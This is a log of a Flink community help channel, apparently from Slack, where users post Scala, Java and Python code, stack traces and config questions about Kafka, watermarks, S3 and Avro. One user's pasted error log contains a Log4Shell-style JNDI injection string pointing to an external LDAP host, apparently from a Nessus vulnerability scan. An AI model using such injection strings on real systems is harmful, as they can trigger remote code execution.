raghav tandon
04/23/2023, 7:18 AM
DataStream[Event] -> Window -> ProcessWindowFunction -> DataStream[Event2] -> Kafka Sink
Everything works fine, but in Kafka I am seeing some values getting shuffled, i.e. some other value comes through that was not intended.
I have a log line right before out.collect(), and things are printed correctly there.
val userIds = events
  .keyBy(e => e.client)
  .window(TumblingProcessingTimeWindows.of(Time.seconds(1)))
  .trigger(
    PurgingTrigger.of(ProcessingTimeTrigger.create())
  )
  .process(userIdFetcher)
  .setParallelism(1)
  .uid(userIdFetcher.getClass().getSimpleName())
final class UserIdFetcher(config: UserIdFetcherConfig, failedOutputTag: OutputTag[ReadErrorEvent])
  extends ProcessWindowFunction[WriteSuccessEvent, Diff, String, TimeWindow]
  with Serializable {

  override def process(
      key: String,
      context: Context,
      elements: Iterable[WriteSuccessEvent],
      out: Collector[Diff]
  ): Unit =
    elements.groupBy[String](update => update.command.id.get).foreach {
      case (id, updates) =>
        retryableProcess(
          id,
          context,
          MongoBulkQuery(
            key,
            "User",
            updates.map(update => update.command.body.identifiers).toList,
            List(UserFields.Id)
          ),
          out
        )
    }
  def retryableProcess(
      id: String,
      context: Context,
      query: MongoBulkQuery,
      out: Collector[Diff],
      attemptNumber: Int = 0
  ): Unit = {
    mongoClient.client(query.client, query.collection).findUserIDs(query).onComplete {
      // NOTE: this callback runs on the Future's executor thread,
      // not on the operator thread that owns `out`.
      case Success(values) =>
        values
          .map(user => user.getObjectId(MongoFields.Id).toHexString())
          .grouped(config.maxBatchSize)
          .foreach { userIdBatch =>
            val diff = Diff(query.client, id, userIdBatch.toList)
            out.collect(diff)
          }
    }
  }
}
final case class Diff(
  @JsonProperty("dbName") client: String,
  @JsonProperty("id") collection: String,
  @JsonProperty("add") add: List[String]
)
But in Kafka this value randomly changes to that of a different id which is also being processed concurrently.
Mali
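A likely culprit (an assumption based on the snippet above, not a confirmed diagnosis): out.collect() is invoked inside the Mongo future's onComplete callback, i.e. on a thread other than the operator's task thread, and Flink collectors are not thread-safe, so output from concurrently completing lookups can interleave. A minimal Java sketch of the safer shape, blocking on the future so every collect() happens on the operator thread; fetchUserIds and the 30-second timeout are hypothetical:

import java.util.List;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.TimeUnit;
import org.apache.flink.util.Collector;

public class BlockingCollectSketch {

    // Hypothetical stand-in for the async MongoDB lookup.
    static CompletableFuture<List<String>> fetchUserIds(String id) {
        return CompletableFuture.completedFuture(List.of("userA", "userB"));
    }

    // Block for the result on the operator thread instead of collecting
    // inside the callback, so collect() is never called concurrently.
    static void emitUserIds(String id, Collector<String> out) throws Exception {
        List<String> userIds = fetchUserIds(id).get(30, TimeUnit.SECONDS);
        for (String userId : userIds) {
            out.collect(id + ":" + userId);
        }
    }
}

For genuinely non-blocking lookups, Flink's Async I/O API (AsyncDataStream with an AsyncFunction) is the supported route, since its ResultFuture is designed to be completed from callback threads.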
04/23/2023, 9:09 AM
�������`�[{"testId"... |
What should I do to remove these special characters?
Many thanks.
Note: I am getting a "Failed to deserialize JSON '�������`�'" error when I try to read it with the json format.
Zachary Schmerber
04/24/2023, 5:44 PM
// log source data from the above Kafka topic using JsonDeserializationSchema
DataStream<ObjectNode> filteredStream = env.fromSource(logSource, WatermarkStrategy.noWatermarks(), "Kafka winlog Source");
DataStream<ObjectNode> winObjectStream = filteredStream.filter(node -> node.get("service_id").asText().equals("cdd31c3f-3b24-4526-848a-xxxxxxxxxxx"));
// Placeholder for logically mapping the new object stream (see the sketch below)
// DataStream that has successfully been transformed into objects
winObjectStream.sinkTo(winEventSink);
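For the mapping placeholder above, a minimal sketch of projecting each ObjectNode into a typed value before sinking; the field name event_id and the String target are made-up assumptions:

import org.apache.flink.api.common.typeinfo.Types;
import org.apache.flink.streaming.api.datastream.DataStream;

// Continues from winObjectStream above: pull one JSON field out of each
// ObjectNode; a POJO target would look the same with a different mapper.
DataStream<String> mapped = winObjectStream
    .map(node -> node.get("event_id").asText())
    .returns(Types.STRING);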
Jeesmon Jacob
04/24/2023, 6:49 PM
We set slotmanager.redundant-taskmanager-num: "1" to run a redundant TM to speed up recovery. But what we have seen is that Flink keeps trying to schedule a new TM pod every few seconds until the redundant TM is ready. So for some time we are seeing many extra TMs in the Pending state, and it is triggering unnecessary node autoscaling. Wondering if there is a configured interval for Flink to detect whether the redundant TM is in the Ready state. We are using the Flink operator for deployment.
Nathanael England
04/24/2023, 7:50 PM
Regarding -pyFiles: the language here isn't too clear about what is expected to happen. I'm getting import failures when I point it to the directory that contains all my wheels.
Nathanael England
04/24/2023, 8:27 PM
What about dependencies with a .so included in the path? I can see from logging my dependencies' contents that the .so is making it to the job.
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/cpp_message.py
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/_message.cpython-38-x86_64-linux-gnu.so
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/__init__.py
The error I get is
ImportError: cannot import name '_message' from 'google.protobuf.pyext' (/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/8541a21e-7834-425d-9a53-63350409a2a5/.deps/google/protobuf/pyext/__init__.py)
Amenreet Singh Sodhi
04/25/2023, 4:48 AM
2023-04-23 18:13:29,093 ERROR org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler [] - Caught exception
java.io.IOException: Connection reset by peer
at sun.nio.ch.FileDispatcherImpl.read0(Native Method) ~[?:?]
at sun.nio.ch.SocketDispatcher.read(SocketDispatcher.java:39) ~[?:?]
at sun.nio.ch.IOUtil.readIntoNativeBuffer(IOUtil.java:276) ~[?:?]
at sun.nio.ch.IOUtil.read(IOUtil.java:233) ~[?:?]
at sun.nio.ch.IOUtil.read(IOUtil.java:223) ~[?:?]
at sun.nio.ch.SocketChannelImpl.read(SocketChannelImpl.java:358) ~[?:?]
at org.apache.flink.shaded.netty4.io.netty.buffer.PooledByteBuf.setBytes(PooledByteBuf.java:253) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.buffer.AbstractByteBuf.writeBytes(AbstractByteBuf.java:1132) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.socket.nio.NioSocketChannel.doReadBytes(NioSocketChannel.java:350) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:151) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:719) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:655) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:581) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:493) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:986) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74) [event_executor-1.0-SNAPSHOT.jar:?]
2023-04-23 18:13:06,279 ERROR org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler [] - Error while responding to the http request.
java.text.ParseException: Unparseable date: "${jndi:<ldap://127.0.0.1#log4shell-generic-dXyfRkM647dI4bcPETOo.w.nessus.org/nessus>}"
at java.text.DateFormat.parse(DateFormat.java:395) ~[?:?]
at org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler.respondToRequest(StaticFileServerHandler.java:210) ~[event_executor-1.0-SNAPSHOT.jar:?]
at ....
Any idea what the possible issue is? Thanks
Krzysztof Chmielewski
04/25/2023, 12:34 PM
Caused by: java.lang.LinkageError: loader constraint violation: when resolving method 'void org.apache.hadoop.util.SemaphoredDelegatingExecutor.<init>(com.google.common.util.concurrent.ListeningExecutorService, int, boolean)' the class loader org.apache.flink.util.ChildFirstClassLoader @2486925f of the current class, org/apache/hadoop/fs/s3a/S3AFileSystem, and the class loader 'app' for the method's defining class, org/apache/hadoop/util/SemaphoredDelegatingExecutor, have different Class objects for the type com/google/common/util/concurrent/ListeningExecutorService used in the signature (org.apache.hadoop.fs.s3a.S3AFileSystem is in unnamed module of loader org.apache.flink.util.ChildFirstClassLoader @2486925f, parent loader 'app'; org.apache.hadoop.util.SemaphoredDelegatingExecutor is in unnamed module of loader 'app')
at org.apache.hadoop.fs.s3a.S3AFileSystem.create(S3AFileSystem.java:769)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:1118)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:1098)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:987)
at io.delta.storage.S3SingleDriverLogStore.write(S3SingleDriverLogStore.java:299)
Any idea what could be causing this problem?
The same job is working fine when writing to a local path, so I'm guessing it is something with the s3 plugin, some dependency issue.
Another job, which does not use the Hive catalog, can write to S3 on the same cluster.
Viktor Hrtanek
Aurora Nockert
04/25/2023, 12:41 PM
Regarding the WITH('properties.sasl.jaas.config'='…') part, it would be nice if the query didn't have to include the password. Is there some way to read it from an env variable, Java -D properties, or a secret store?
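One workaround sketch, assuming the DDL is assembled in Java rather than submitted as standalone SQL: read the secret from an environment variable and splice it into the JAAS string, so the password never lives in the query text. The variable name KAFKA_SASL_PASSWORD and all connector values are made up:

import org.apache.flink.table.api.EnvironmentSettings;
import org.apache.flink.table.api.TableEnvironment;

public class SaslFromEnv {
    public static void main(String[] args) {
        TableEnvironment tEnv =
            TableEnvironment.create(EnvironmentSettings.inStreamingMode());
        // Hypothetical env variable holding the secret.
        String password = System.getenv("KAFKA_SASL_PASSWORD");
        String jaas = String.format(
            "org.apache.kafka.common.security.plain.PlainLoginModule required "
                + "username=\"svc-user\" password=\"%s\";", password);
        tEnv.executeSql(
            "CREATE TABLE events (msg STRING) WITH ("
                + " 'connector' = 'kafka',"
                + " 'topic' = 'events',"
                + " 'properties.bootstrap.servers' = 'broker:9092',"
                + " 'properties.security.protocol' = 'SASL_SSL',"
                + " 'properties.sasl.mechanism' = 'PLAIN',"
                + " 'properties.sasl.jaas.config' = '" + jaas + "',"
                + " 'format' = 'json')");
    }
}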
Sergey Postument
04/25/2023, 1:35 PM
I use KafkaSink to save my events to Kafka, but under heavy load I'm getting Flink app restarts due to: Caused by: org.apache.kafka.common.errors.RecordTooLargeException: The message is 6520160 bytes when serialized which is larger than the maximum request size you have configured with the max.request.size configuration.
This is pretty strange, since the messages I save via KafkaSink are JSON strings of at most 2k characters, not `6520160` bytes (6.5 MB). Please point me to some documentation; what am I missing here? p.s. Flink 1.14.6
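A minimal sketch of passing producer properties through the Flink 1.14 KafkaSink builder; the 10 MB cap, topic, and broker are assumptions. The Kafka client appears to raise this error for a single serialized record, so something in the job may be emitting one 6.5 MB record; raising max.request.size works around it, but logging the record size before the sink would show what is actually that large.

import java.util.Properties;
import org.apache.flink.api.common.serialization.SimpleStringSchema;
import org.apache.flink.connector.base.DeliveryGuarantee;
import org.apache.flink.connector.kafka.sink.KafkaRecordSerializationSchema;
import org.apache.flink.connector.kafka.sink.KafkaSink;

public class LargeRecordSink {
    public static KafkaSink<String> build() {
        Properties props = new Properties();
        // Raise the per-request cap above the 6.5 MB seen in the error.
        props.setProperty("max.request.size", "10485760");
        return KafkaSink.<String>builder()
            .setBootstrapServers("broker:9092")
            .setKafkaProducerConfig(props)
            .setRecordSerializer(
                KafkaRecordSerializationSchema.builder()
                    .setTopic("events")
                    .setValueSerializationSchema(new SimpleStringSchema())
                    .build())
            .setDeliveryGuarantee(DeliveryGuarantee.AT_LEAST_ONCE)
            .build();
    }
}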
Mali
04/25/2023, 2:17 PM
[{"abc":"123", "cde":"456"},{"efg":"789", "abc":"123"}]
Johannes Cox
04/25/2023, 2:51 PM
The watermarks defined in our CREATE TABLE statement seem to disappear, and we encounter the following error:
java.lang.RuntimeException: Record has Long.MIN_VALUE timestamp (= no timestamp marker). Is the time characteristic set to 'ProcessingTime', or did you forget to call 'DataStream.assignTimestampsAndWatermarks(...)'?
at org.apache.flink.streaming.api.windowing.assigners.SlidingEventTimeWindows.assignWindows(SlidingEventTimeWindows.java:80) ~[flink-streaming-java-1.16.1.jar:1.16.1]
at org.apache.flink.streaming.runtime.operators.windowing.WindowOperator.processElement(WindowOperator.java:284) ~[flink-streaming-java-1.16.1.jar:1.16.1]
...
We are currently fixing it by assigning timestamps a second time, after the conversion, but it feels like this shouldn't be necessary (see the sketch of the workaround below). Are we misunderstanding how watermarks work (especially with regard to mixing the Table and DataStream APIs), or did we possibly encounter a bug? Is reassigning watermarks a valid approach in general?
To give more context, we're using Flink 1.16.1 with the Java API and consume a Kinesis stream (although consuming from a file source yields the same behaviour). In the job we have two aggregations that use different SlidingEventTimeWindows and an intervalJoin to join the results.
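A minimal sketch of the workaround mentioned above, reassigning timestamps and watermarks right after the Table-to-DataStream conversion; tableEnv and rawTable stand for the existing objects, and the field name event_time and the 5-second bound are assumptions:

import java.time.Duration;
import java.time.Instant;
import org.apache.flink.api.common.eventtime.WatermarkStrategy;
import org.apache.flink.streaming.api.datastream.DataStream;
import org.apache.flink.types.Row;

// Reassign event time on the converted stream before the sliding windows.
DataStream<Row> withTimestamps = tableEnv.toDataStream(rawTable)
    .assignTimestampsAndWatermarks(
        WatermarkStrategy.<Row>forBoundedOutOfOrderness(Duration.ofSeconds(5))
            .withTimestampAssigner((row, previousTimestamp) ->
                ((Instant) row.getField("event_time")).toEpochMilli()));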
Nathanael England
04/25/2023, 5:31 PM
Is there a way to expose the web UI via NodePort? I can manually patch things after startup and access the web UI, but I'd like the web UI to be available on a consistent port. The only mention I see of NodePort in the Helm setup is for role-based access control.
Amir Hossein Sharifzadeh
04/25/2023, 6:30 PM
Table raw_table = tableEnv.sqlQuery(data_query);
DataStream<Row> join_stream = tableEnv.toDataStream(raw_table);
SingleOutputStreamOperator<List<double[][][]>> outputStreamOperator = join_stream.process(new EMPADProcessor(commands, taskENT.getTaskId()));
where public void processElement(Row row, ProcessFunction<Row, List<double[][][]>>.Context context, Collector<List<double[][][]>> collector) throws Exception {
Inside processElement I am doing some data analysis that takes a few moments for every single message (row), and this short processing time causes duplicated messages, and I don't know why.
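One thing worth ruling out (an assumption, not a diagnosis): if the joined query produces updates rather than pure inserts, e.g. when converted with toChangelogStream, a single logical change arrives as multiple rows that look like duplicates. A minimal sketch that logs each row's RowKind to check:

import org.apache.flink.streaming.api.functions.ProcessFunction;
import org.apache.flink.types.Row;
import org.apache.flink.util.Collector;

// Pass-through operator that logs the changelog kind (+I, -U, +U, -D) of
// every row before the real processing, to see whether the "duplicates"
// are actually update pairs for the same key.
join_stream
    .process(new ProcessFunction<Row, Row>() {
        @Override
        public void processElement(Row row, Context ctx, Collector<Row> out) {
            System.out.println(row.getKind() + " " + row);
            out.collect(row);
        }
    });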
Rion Williams
04/25/2023, 8:06 PM
I'm monitoring consumer lag (kafka_consumergroup_lag) for one of my Flink jobs to determine when something upstream may have failed. This particular job doesn't commit offsets at periodic intervals, and the point of degradation isn't a static value that applies across all environments (so I can't simply use something like kafka_consumergroup_lag{topic="topic-for-flink"} > $someThreshold).
Does anyone have any ideas on this front? I'm basically just trying to set up an alert if my consumer lag for this particular job purely increases for an hour. I've tried a few different approaches involving derivatives, etc. but haven't had much luck thus far.
kingsathurthi
04/26/2023, 5:42 AM
Warning [IST0117] (Deployment f0/flink-kubernetes-operator) No service associated with this deployment. Service mesh deployments must be associated with a service.
Info [IST0118] (Service f0/pod1-ingester) Port name ingester (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod1-rest) Port name rest (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod2-ingester) Port name ingester (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod2-rest) Port name rest (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Kevin T
04/26/2023, 5:59 AM
I followed the <https://nightlies.apache.org/flink/flink-docs-master/docs/flinkdev/ide_setup/> instructions, but on step 7, when I executed mvn clean package -DskipTests I got:
[ERROR] Failed to execute goal net.alchim31.maven:scala-maven-plugin:3.2.2:testCompile (scala-test-compile) on project flink-scala_2.12: wrap: org.apache.commons.exec.ExecuteException: Process exited with an error: 240 (Exit value: 240) -> [Help 1]
I have Scala 2.12.17, JDK 11, and Maven 3.9.0 installed.
How do I fix this issue?
chankyeong won
04/26/2023, 7:29 AM
How can I use my MySink class on the DataStream in my Flink application's main method?
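A minimal sketch of wiring a custom sink in main(), assuming MySink implements the SinkFunction interface (for the newer Sink interface it would be sinkTo instead of addSink); the job name and the stand-in MySink body are made up:

import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;
import org.apache.flink.streaming.api.functions.sink.SinkFunction;

public class MySinkJob {
    public static void main(String[] args) throws Exception {
        StreamExecutionEnvironment env =
            StreamExecutionEnvironment.getExecutionEnvironment();
        env.fromElements("a", "b", "c")
            .addSink(new MySink()); // attach the custom sink to the stream
        env.execute("my-sink-job");
    }

    // Hypothetical stand-in for the user's MySink.
    static class MySink implements SinkFunction<String> {
        @Override
        public void invoke(String value, Context context) {
            System.out.println(value);
        }
    }
}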
Marcus Baule
04/26/2023, 9:00 AM
deserialization_schema = AvroRowDeserializationSchema(
    avro_schema_string=schema_str_source
)
I receive an error when executing:
org.apache.flink.avro.shaded.org.apache.avro.AvroRuntimeException: Malformed data. Length is negative: -1
Thanks and cheers,
marcus
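In case it helps: "Malformed data. Length is negative" from the Avro decoder is commonly seen when the bytes on the topic are not plain Avro records, for example when the producer used the Confluent Schema Registry wire format (a magic byte plus a 4-byte schema id before the Avro body), which AvroRowDeserializationSchema cannot read. This is an assumption about the producer, not a confirmed diagnosis. A minimal Java sketch of the registry-aware schema for comparison; the registry URL and record schema are made up, and PyFlink has no direct wrapper for this class:

import org.apache.avro.Schema;
import org.apache.flink.formats.avro.registry.confluent.ConfluentRegistryAvroDeserializationSchema;

public class ConfluentAvroCheck {
    public static void main(String[] args) {
        Schema schema = new Schema.Parser().parse(
            "{\"type\":\"record\",\"name\":\"R\","
                + "\"fields\":[{\"name\":\"x\",\"type\":\"string\"}]}");
        // Strips the registry framing and decodes the Avro body.
        var deserializer = ConfluentRegistryAvroDeserializationSchema.forGeneric(
            schema, "http://schema-registry:8081");
    }
}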